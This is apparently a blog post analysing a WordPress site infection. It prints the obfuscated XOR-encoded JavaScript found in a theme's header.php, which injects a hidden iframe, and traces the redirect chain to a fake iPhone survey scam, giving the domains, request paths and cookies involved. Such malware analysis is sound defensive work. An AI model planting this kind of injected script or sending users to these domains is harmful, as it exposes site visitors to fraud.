The symptom of the infection is clear: the first time you visit the home you get redirected to a fake online survey which promises you an Iphone. You can reach this page only once a day, if you use the same ip address.Here a screenshot of the fake survey. Unidata is my ISP.
iframe height="0" src="c11n4.i.teaserguide.com/snitch?default_keyword=Home%20-%20Sito%&referrer=&se_referrer=&source=www.thesite.com" width="0" iframeThe domain teaserguide.com, registered by some Russian people acquires the name of the site and its address, probabily to track the infection. But who is writing this iframe?
At a first look through the code, I found the malevolent script inside the header.php of my theme (Avada child).
The script is encrypted and it looks like this:
var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);Using a Javascript SandBox I was able to run the script and to verify that it is composing exactly the iframe of the home page.
Ok, perfect, infection found and removed, but... I want to discover some more and I went deeply using Wireshark.
What I found let me surprised. The redirection, in fact, passes through different sites and services, here listed:
Step 1:
46.229.167.130 HTTP 606 GET /xzAx3?sid1=Test_Source1&sid2=c11n4.i.teaserguide.com&sid3=www.thesite.comIf we query that ip without compiling exactly the parameters of the GET, we see a return page composed by a single sentence: no found offer.
This suggest me that this service return different pages for different sites/requests.
Step 2:
HTTP 389 HTTP/1.1 302 Found (text/html)[Malformed Packet]
bdvice.net/hs/?r=http://djsrp.com/c/41962/54197/?sid=&trx=60q5yyaxk2Step 3:
46.229.167.130 HTTP 642 GET /hs/?r=http%3A%2F%2Fdjsrp.com%2Fc%2F41962%2F54197%2F%3Fsid%3D%26trx%3Dzc0ccua00t HTTP/1.1Step 4:
54.210.222.29 HTTP 452 GET /c/41962/54197/?sid=&trx=zc0ccua00t HTTP/1.1Step 5:
id06t.cleardefendlinked.com/?&s1=54197&s2=501595675-222617964-2065267263This step is interesting because the domain id06t.cleardefendlinked.com is hosted on the Amazon Cloud platform, as hidden service on: wsf11-1661233086.us-east-1.elb.amazonaws.com
Here we can find a service that offers you a redirect tool or, it is our case, a "Rotator Tool", which is able to rotate and split your link in different urls.
Our destination link will be:
Step 6:
bMnzz.exclusiverewards.daqa.info/?sov=63633901&hid=hnljjpplnlpxp&redid=6958&gsid=68&id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68This is the link with the fake online survey. The address is different from the image posted on the top of my post, because this has been reached in another moment, from a different pc.
Analyzing the traffic coming from this final site, we discover the repository for the code used to compose the fake online survey:
192.155.85.199 HTTP 312 GET /templates/_common/_templates/isp_survey_noselect_IT/css/style.cssThe suffix IT suggested me that a customized version of the survey exists and in fact you can query styles and scripts also for different languages by changing the suffix.
/templates/_common/js/date/returnDate.it.js
/templates/_common/_templates/isp_survey_noselect_IT/js/script.js
/templates/_common/_templates/isp_survey_noselect_IT/images/logo_red.png
Other sites connected to the redirection service are:
jvvzz.allnrgames.pocketmarble.science/?sov=63633901&hid=hxlpjrjhjhjrlpxp&redid=6958&gsid=68&id=XNSX.-r6958-t68
it.reimageplus.com/lp/slm/index.php?tracking=YTZ&banner=&adgroup=&ads_name=direct&keyword=direct&context=Co10k75n3p
You can enjoy trying different query to the amazon services.
Of course this analysis is a partial one, because I'm not a strong security researcher and the security world is only an hobby for me, like the web programming. (Sorry but I prefer embedded and desktop programming) :)
Anyway I want to end this story by reporting also the cookie that this site set and it is:
Cookie: log_63633901=1; noshid=hvpzlxjlhnlpxp; id=XNSX.54197%3A%3A501595675%7C%7C222617964%7C%7C2065267263-r6958-t68; SITE_ID=63633901; sov=63633901; mov=nr.ytsurvey.mini; redid=6958; gsid=68; URI=sov%3D63633901%26hid%3Dhnljjpplnlpxp%26redid%3D6958%26gsid%3D68%26id%3DXNSX.54197%253A%253A501595675%257C%257C222617964%257C%257C2065267263-r6958-t68; templateid=26191; path=isp_survey_noselect_IT; version=366255;
In case I'll find any news, I'll update the post, hoping that this will be useful to ban those sites and to remove these infections.
